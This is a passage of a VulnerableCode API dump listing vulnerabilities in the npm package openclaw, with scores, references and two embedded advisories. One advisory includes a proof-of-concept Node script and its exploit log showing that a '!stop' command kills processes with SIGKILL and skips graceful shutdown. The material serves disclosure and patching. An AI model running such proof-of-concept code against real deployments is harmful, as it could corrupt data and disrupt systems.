"VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-jp4j-q5fc-58gv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-csnc-r6fv-j3en" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90131?format=api", "vulnerability_id": "VCID-cvmw-sxfq-dyhz", "summary": "OpenClaw: Pairing pending-request caps were enforced per channel instead of per account\n## Summary\n\nBefore OpenClaw 2026.3.31, pending pairing-request caps were enforced per channel file instead of per account. On multi-account channel setups, requests from other accounts could fill the shared pending window and block new pairing challenges on an unaffected account.\n\n## Impact\n\nThis issue could deny new pairing or onboarding on another account until an existing request was approved or expired. It was an availability-only bug; it did not allow cross-account approval, data access, or authorization bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `>= 2026.2.26, < 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `9bc1f896c8cd325dd4761681e9bdb8c425f69785` — scope pending request caps per account\n\n## Release Process Note\n\nThe fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41346", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00169", "scoring_system": "epss", "scoring_elements": "0.37899", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00169", "scoring_system": "epss", "scoring_elements": "0.3787", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00169", "scoring_system": "epss", "scoring_elements": "0.37901", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41346" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/9bc1f896c8cd325dd4761681e9bdb8c425f69785", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/9bc1f896c8cd325dd4761681e9bdb8c425f69785" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wwfp-w96m-c6x8", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wwfp-w96m-c6x8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41346", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41346" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-improper-pending-pairing-request-cap-enforcement", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-improper-pending-pairing-request-cap-enforcement" }, { "reference_url": "https://github.com/advisories/GHSA-wwfp-w96m-c6x8", "reference_id": "GHSA-wwfp-w96m-c6x8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wwfp-w96m-c6x8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41346", "GHSA-wwfp-w96m-c6x8" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cvmw-sxfq-dyhz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90875?format=api", "vulnerability_id": "VCID-cvxu-rdbu-abd2", "summary": "OpenClaw has incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts`\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Advisory Details\n**Title**: Incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts`\n\n**Description**:\n### Summary\nThe `!stop` (and `/bash stop`) chat command kills background bash processes using `SIGKILL` directly, without first sending `SIGTERM` to allow graceful shutdown. This is because `bash-command.ts` imports `killProcessTree()` from `src/agents/shell-utils.ts`, which still contains the pre-CVE-2026-27486 aggressive kill logic, rather than from the patched `src/process/kill-tree.ts`.\n\n### Details\nCVE-2026-27486 fixed unsafe process termination by introducing a graceful shutdown sequence in `src/process/kill-tree.ts` — sending `SIGTERM` first, waiting a configurable grace period (default 3 seconds), then escalating to `SIGKILL` only if the process is still alive.\n\nHowever, an identical copy of the **unpatched** `killProcessTree` function remains in `src/agents/shell-utils.ts` (lines 170–192). This function sends `SIGKILL` immediately with no `SIGTERM`:\n\n```typescript\n// src/agents/shell-utils.ts:170-192\nexport function killProcessTree(pid: number): void {\n // ... Windows handling ...\n try {\n process.kill(-pid, \"SIGKILL\"); // Immediate hard kill, no SIGTERM\n } catch {\n try {\n process.kill(pid, \"SIGKILL\");\n } catch {\n // process already dead\n }\n }\n}\n```\n\nThe `!stop` chat command handler in `src/auto-reply/reply/bash-command.ts` imports and calls this vulnerable version at line 302:\n\n```typescript\n// src/auto-reply/reply/bash-command.ts:5\nimport { killProcessTree } from \"../../agents/shell-utils.js\";\n\n// src/auto-reply/reply/bash-command.ts:300-304\nconst pid = running.pid ?? running.child?.pid;\nif (pid) {\n killProcessTree(pid); // Calls the UNPATCHED version\n}\nmarkExited(running, null, \"SIGKILL\", \"failed\");\n```\n\nCompare this to the patched version in `src/process/kill-tree.ts`:\n\n```typescript\n// src/process/kill-tree.ts:46-78\nfunction killProcessTreeUnix(pid: number, graceMs: number): void {\n // Step 1: Try graceful SIGTERM to process group\n try {\n process.kill(-pid, \"SIGTERM\");\n } catch { /* ... */ }\n\n // Step 2: Wait grace period, then SIGKILL if still alive\n setTimeout(() => {\n if (isProcessAlive(-pid)) {\n try { process.kill(-pid, \"SIGKILL\"); } catch { /* ... */ }\n }\n }, graceMs).unref();\n}\n```\n\n### PoC\n\nThis PoC demonstrates the difference between the vulnerable and patched code paths inside a running OpenClaw Gateway container.\n\n**Setup:**\n```bash\n# Build and start the gateway container\ncd CVE-2026-27486-variant-exp/\ndocker compose up -d\nsleep 5\n```\n\n**Exploit (vulnerable `killProcessTree` from `shell-utils.ts`):**\n\nThe following script is injected into the container and executed. It starts a bash process that traps `SIGTERM` for graceful shutdown, then kills it using the same code path as `!stop`:\n\n```javascript\n// exploit_sigkill.cjs — replicates src/agents/shell-utils.ts:183-190\nconst { spawn } = require('child_process');\nconst fs = require('fs');\n\ntry { fs.unlinkSync('/tmp/graceful_shutdown.txt'); } catch {}\n\nconst child = spawn('/bin/bash', ['-c',\n 'trap \\'echo GRACEFUL_SHUTDOWN > /tmp/graceful_shutdown.txt; exit 0\\' SIGTERM; while true; do sleep 1; done'\n], { detached: true, stdio: 'ignore' });\nchild.unref();\n\nsetTimeout(() => {\n // VULNERABLE: same as shell-utils.ts — SIGKILL only\n try { process.kill(-child.pid, 'SIGKILL'); } catch {\n try { process.kill(child.pid, 'SIGKILL'); } catch {}\n }\n setTimeout(() => {\n if (fs.existsSync('/tmp/graceful_shutdown.txt')) {\n console.log('[BLOCKED] SIGTERM was received.');\n process.exit(1);\n } else {\n console.log('[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.');\n process.exit(0);\n }\n }, 2000);\n}, 1000);\n```\n\n**Run:**\n```bash\npython3 poc_exploit.py\n```\n\n### Log of Evidence\n\n**Exploit output (SIGKILL only, no graceful shutdown):**\n```\n[*] Running exploit (vulnerable killProcessTree from shell-utils.ts)...\n[*] Victim PID: 78\n[*] Calling vulnerable killProcessTree (SIGKILL only, no SIGTERM)...\n[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.\n[EXPLOITED] Graceful shutdown handler was NEVER invoked.\n\n[SUCCESS] CVE-2026-27486 variant confirmed:\n killProcessTree() in shell-utils.ts sends immediate SIGKILL,\n bypassing the graceful shutdown fix in process/kill-tree.ts.\n```\n\n**Control output (SIGTERM first, graceful shutdown works):**\n```\n[*] Running control (patched killProcessTree from process/kill-tree.ts)...\n[*] Victim PID: 93\n[*] Calling patched killProcessTree (SIGTERM first, then SIGKILL after grace)...\n[NORMAL] SIGTERM received — graceful shutdown completed. Flag: GRACEFUL_SHUTDOWN\n\n[NORMAL] Control confirmed: patched killProcessTree sends SIGTERM first,\n allowing graceful shutdown before escalating to SIGKILL.\n```\n\n### Impact\nWhen `!stop` is used, background processes are killed instantly via `SIGKILL` with no chance to perform cleanup. This can result in:\n\n- **Data corruption**: processes writing to files or databases are interrupted mid-write\n- **Resource leaks**: temporary files, lock files, and network connections are not properly released\n- **Security-sensitive cleanup skipped**: operations like erasing in-memory secrets or completing audit logs are bypassed\n\nThis is the same class of impact that CVE-2026-27486 was filed for — the fix simply missed the `shell-utils.ts` copy of the function.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.3.14\n- **Patched versions**: <None>\n\n### Severity\n- **Severity**: Medium\n- **Vector string**: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H\n\n### Weaknesses\n- **CWE**: CWE-404: Improper Resource Shutdown or Release\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192](https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192) | The vulnerable `killProcessTree` function that sends immediate `SIGKILL` without `SIGTERM`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5) | Import statement pulling the vulnerable `killProcessTree` from `shell-utils.ts` instead of the patched `kill-tree.ts`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304) | The `!stop` handler calling the vulnerable `killProcessTree(pid)`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78](https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78) | The **patched** `killProcessTreeUnix` with graceful `SIGTERM` → grace period → `SIGKILL` sequence (for reference). |", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35667", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04185", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04174", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35667" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:31Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35667", "reference_id": "CVE-2026-35667", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35667" }, { "reference_url": "https://github.com/advisories/GHSA-3298-56p6-rpw2", "reference_id": "GHSA-3298-56p6-rpw2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3298-56p6-rpw2" }, { "reference_url": "https://github.com/advisories/GHSA-jfv4-h8mc-jcp8", "reference_id": "GHSA-jfv4-h8mc-jcp8", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jfv4-h8mc-jcp8" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts", "reference_id": "openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:31Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { 